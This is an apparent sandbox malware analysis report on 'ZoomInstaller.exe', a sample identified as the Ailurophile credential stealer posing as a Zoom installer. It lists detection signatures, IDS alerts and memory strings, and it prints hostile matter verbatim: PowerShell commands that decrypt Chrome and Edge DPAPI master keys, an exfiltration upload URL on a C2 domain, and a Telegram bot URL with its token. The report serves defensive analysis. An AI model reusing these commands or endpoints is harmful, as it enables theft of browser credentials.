Windows Analysis Report
ZoomInstaller.exe

Overview

General Information

Sample name: ZoomInstaller.exe
Analysis ID: 1544493
MD5: 806a6ccce380785faa45512ce603c580
SHA1: 78a2936e19f0474f80f73144564e9f24c4559859
SHA256: c831aebefaf218907d8164288a8249755c47f68b5a6dd223dcef2d150d8df396
Tags: exe, user-NDA0E

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Detected generic credential text file
Installs new ROOT certificates
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ZoomInstaller.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\ZoomInstaller.exe" MD5: 806A6CCCE380785FAA45512CE603C580)
    • WMIC.exe (PID: 7328 cmdline: wmic path win32_videocontroller get caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7440 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7520 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7600 cmdline: wmic os get Version MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7684 cmdline: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7832 cmdline: powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7952 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8052 cmdline: powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4340 cmdline: powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Yara matches:

Source                                            | Rule                          | Description                       | Author       | Strings
Process Memory Space: ZoomInstaller.exe PID: 7284 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer  | Joe Security |

Sigma match:
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", CommandLine: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZoomInstaller.exe", ParentImage: C:\Users\user\Desktop\ZoomInstaller.exe, ParentProcessId: 7284, ParentProcessName: ZoomInstaller.exe, ProcessCommandLine: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", ProcessId: 7684, ProcessName: powershell.exe

Suricata IDS alerts:

Timestamp                        | SID     | Severity | Classtype                            | Source IP   | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T14:03:31.221087+0100  | 2057104 | 1        | Domain Observed Used for C2 Detected | 192.168.2.4 | 49737       | 188.114.97.3   | 443              | TCP
2024-10-29T14:03:30.538215+0100  | 2057103 | 1        | Domain Observed Used for C2 Detected | 192.168.2.4 | 65406       | 1.1.1.1        | 53               | UDP


    AV Detection

    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 90.7% probability
    Source: ZoomInstaller.exe | Joe Sandbox ML: detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00007FFD9BAB52AE CryptUnprotectData,15_2_00007FFD9BAB52AE
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD9BAD52AE CryptUnprotectData,17_2_00007FFD9BAD52AE
    Source: ZoomInstaller.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

    Networking

    Source: Network traffic | Suricata IDS: 2057103 - Severity 1 - ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop) : 192.168.2.4:65406 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2057104 - Severity 1 - ET MALWARE Observed Win32/Ailurophile Stealer Domain (manestvli .shop) in TLS SNI : 192.168.2.4:49737 -> 188.114.97.3:443
    Source: unknown | DNS query: name: api.telegram.org
    Source: Joe Sandbox View | IP Address: 149.154.167.220
    Source: Joe Sandbox View | IP Address: 104.26.9.59
    Source: Joe Sandbox View | IP Address: 188.114.97.3
    Source: Joe Sandbox View | ASN Name: TELEGRAMRU
    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1, Host: api.myip.com, User-Agent: Go-http-client/1.1, Accept-Encoding: gzip
    Source: global traffic | DNS traffic detected: DNS query: api.myip.com
    Source: global traffic | DNS traffic detected: DNS query: manestvli.shop
    Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
    Source: unknown | HTTP traffic detected: POST /upload.php?data=…&hash=2d6441c1bfc749b0344f HTTP/1.1, Host: manestvli.shop, User-Agent: Go-http-client/1.1, Content-Length: 6347, Content-Type: multipart/form-data; boundary=c4f7aaa42ff4a8b0a52c6b01c13381cfc6993937b438de4a4efa6525794a, Accept-Encoding: gzip
    Source: powershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000364000.00000004.00001000.00020000.00000000.sdmp, info.txt.0.dr | String found in binary or memory: https://ailurophilestealer.com
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://ailurophilestealer.com/bot
    Source: powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.myip.com
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot%s/sendMessage
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 0000000F.00000002.1815118814.0000025639633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405EF42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://manestvli.shop/upload.php?
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://manestvli.shop/upload.php?C:
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drT
    Source: powershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
    Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054A000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000049000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.dr | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016========
    Source: ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.dr | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.dr | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
    Source: ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.dr | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: DestroyEnvironmentBlockreflect.Value.Interfacereflect.Value.NumMethodRemoveFontMemResourceExGetLogicalDriveStringsWSHGetSpecialFolderPathWRegisterRawInputDevicestoo many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classunsupported certificateno application protocolech accept confirmationCLIENT_TRAFFIC_SECRET_0SERVER_TRAFFIC_SECRET_0QUICEncryptionLevel(%v)varint integer overflowexit hook invoked panicpattern bits too long: GetSidSubAuthorityCountQueryServiceLockStatusWRegNotifyChangeKeyValueSetKernelObjectSecurityDeleteVolumeMountPointWGetActiveProcessorCountSetInformationJobObjectSetNamedPipeHandleStateSetProcessPriorityBoostNtSetInformationProcessGetFileVersionInfoSizeWinvalid PrintableStringx509: malformed UTCTimex509: invalid key usagex509: malformed versionP224 point not on curveP256 point not on curveP384 point not on curveP521 point not on curveinvalid scalar encodingasn1: structure error: truncated tag or length942d6eb00e0cbfd901026890zip: writer closed twicejson: unsupported type: runtime: C malloc failedargument must be a FLOATPRAGMA auto_vacuum = %d;PRAGMA synchronous = %s;application/octet-streamunexpected buffer len=%vinvalid pseudo-header %qframe_headers_prio_shortinvalid request :path %qread_frame_conn_error_%sRequest Entity Too Largehttp: nil Request.Headerexec: Stdout already settracecheckstackownershiphash of unhashable type span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavailablememstr_baf83cf5-4
    Source: ZoomInstaller.exe | Static PE information: Number of sections : 24 > 10
    Source: ZoomInstaller.exe, 00000000.00000000.1697687201.00007FF68496E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
    Source: ZoomInstaller.exe | Binary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
    Source: classification engine | Classification label: mal76.troj.spyw.evad.winEXE@28/27@3/3
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File created: C:\Users\user\AppData\Local\Ailurophile
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cig3xdrr.qj1.ps1
    Source: ZoomInstaller.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;PRAGMA locking_mode = NORMAL;PRAGMA synchronous = NORMAL;
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
